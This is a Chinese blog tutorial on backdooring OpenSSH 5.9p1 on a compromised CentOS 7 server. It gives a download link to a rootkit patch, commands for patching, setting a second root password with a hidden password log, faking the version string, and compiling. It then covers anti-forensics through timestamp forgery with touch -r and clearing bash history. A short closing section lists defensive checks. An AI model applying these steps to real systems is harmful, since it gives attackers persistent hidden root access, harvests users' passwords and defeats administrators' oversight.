0
点赞
收藏
分享

微信扫一扫

ssh后门介绍与防御

瑾谋 2023-03-14 阅读 89
网络安全kali linux配置文件编译安装外网Python后端开发


文章目录

  • ​​1 介绍​​
  • ​​2 实战演练​​
  • ​​2.1 查看版本​​
  • ​​2.2 下载SSH配置文件​​
  • ​​2.3 安装​​
  • ​​2.4 修改后门密码and文件记录​​
  • ​​2.5 编译安装​​
  • ​​2.6 摸出痕迹​​
  • ​​3 防御ssh后门​​

1 介绍

当拿到root权限后,一般需要维持权限(留后门),可以做openssh后门,也就是root双密码,管理员一个密码,我们的后门一个密码。

2 实战演练

实验环境:Centos7

2.1 查看版本

ssh -v

ssh后门介绍与防御_网络安全


可以对ssh备份配置文件,可以对后期的文件时间进行修改

cp -p /etc/ssh/ssh_config  / etc/ssh/ssh_config.bak

cp -p /etc/ssh/ sshd_config  /etc/ssh/sshd_config.bak

2.2 下载SSH配置文件

官网:​​http://www.openssh.com/​​

openssh-5.9p1.tar.gz
openssh-5.9p1.patch.tar.gz

http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz

2.3 安装

上传方法:中国蚁剑等

tar -zx vf openssh-5.9p1.tar.gz

tar -zx vf openssh-5.9p1.patch.tar.gz

将​​openssh-5.9p1.patch​​​中的​​sshbd5.9p1.diff​​​复制到​​openssh-5.9p1​​中

cp ./openssh-5.9p1.patch/sshbd5.9p1.diff ./openssh-5.9p1/sshbd5.9p1.diff

在​​openssh-5.9p1​​中执行

patch < sshbd5.9p1.diff

如果patch 未安装

yum -y install patch。

ssh后门介绍与防御_编译安装_02

2.4 修改后门密码and文件记录

vim includes.h

ssh后门介绍与防御_编译安装_03


可以修改后门密码和记录文件,文件前面加 ​​.​​相当于隐藏文件,也可以修改个隐蔽目录

修改后

ssh后门介绍与防御_外网_04


修改版本

原则:修改为与我们刚才查看的版本信息一致,使其不易被发现。

vim version.h

ssh后门介绍与防御_kali linux_05


ssh后门介绍与防御_kali linux_06

2.5 编译安装

CentOS 7
首先对ssh里面的几个key的权限进行修改,否则可能进行编译的时候key不能修改而报错。

chmod 620 moduli
chmod 600  /etc/ssh/ssh_host_ed25519_key
chmod 600  /etc/ssh/ssh_host_ecdsa_key
chmod 600  /etc/ssh/ssh_host_rsa_key
chmod 600  /etc/ssh/ssh_host_ed25519_key

安装所需环境

yum install -y openssl openssl-devel pam-devel

编译安装

./configure --prefix=/usr --sysconfdir=/etc/ssh、

make && make install

service sshd restart

使用我们的后门密码可以正常登陆,以前的密码也有记录,实验成功

2.6 摸出痕迹

touch -r 老文件时间戳 新文件时间戳

touch -r /etc/ssh/ssh_config.bak / etc/ssh/ssh_config

touch -r /etc/ssh/sshd_config.bak / etc/ssh/sshd_config

清除操作日志

echo >/root/.bash_history //清空操作日志

还有log什么的

3 防御ssh后门

  1. 重装openssh,更新到最新版本
  2. 将SSH默认登录端口22改为其他端口
  3. IPTable中添加SSH访问策略
  4. 查看ssh配置文件和/usr/sbin/sshd的时间

stat /usr/sbin/sshd

  1. 查看安全日志

more /var/log/secure |grep Accepted

排查ip

ssh后门介绍与防御_外网_07

  1. 通过strace监控sshd进程读写文件的操作一般的sshd后门都会将账户密码记录到文件,可以通过strace进程跟踪到ssh登录密码文件。

ps axu | grep sshd | grep -v grep

端口监控:内网监控和外网监控:外网端口通过白名单控制,严禁私自开启外网端口;内网端口变化性比较大,需要多研究。

文件监控:
建立起文件监控体系,周期性检测文件的完整性,监控文件的权限变化。匹配软件MD5值以免软件被替换

配置安全:做好基线检测,服务器被入侵后,往往会修改用户配置,而通常hids并不会去检测文件的内容。基线配置的建立就显得尤为重要

流量检测:这一点常见的hids都能实现,snort什么的,关键是各种防御体系的联动以及分析,提取出安全事件,进而提升到威胁情报

参考文章:
​ https://hu3sky.github.io/2018/09/06/%E5%90%8E%E9%97%A8/​​

ubuntu有一点差异,参考下面文章
​ https://www.jianshu.com/p/c1cd73b072f1​​

​​https://www.secpulse.com/archives/69093.html​​


举报

相关推荐

web安全入门-ssh测试与防御

ssh爆破安全入门网络/安全

后门原理与实践

c语言字符串

【SSH】SSH框架(一)——宏观介绍

框架ssh电子商务双十一JavaScript前端开发

[ 应急响应进阶篇-1 ] Windows 创建后门并进行应急处置(后门账户\计划任务后门\服务后门\启动项后门\粘贴键后门)

应急响应j基础Windows创建后门并应急windows后门账户windows计划任务后门windows服务后门Windows启动项后门shift粘贴键后门网络

操作系统权限维持(十一)之Linux系统-SSH Wrapper后门

linuxssh服务器网络安全网络MySQL数据库

ssrf检测防御与绕过

服务器IPDNS网络安全

操作系统权限维持(十三)之Linux系统- SSH Keylogger记录密码后门

linux服务器安全网络安全网络JavaScript前端开发

复现黑客在后门中藏匿后门

phpweb安全web后端服务器

Web 框架与 CSRF 防御

csrf网络前端

phpstudy后门

web安全渗透测试php
0 条评论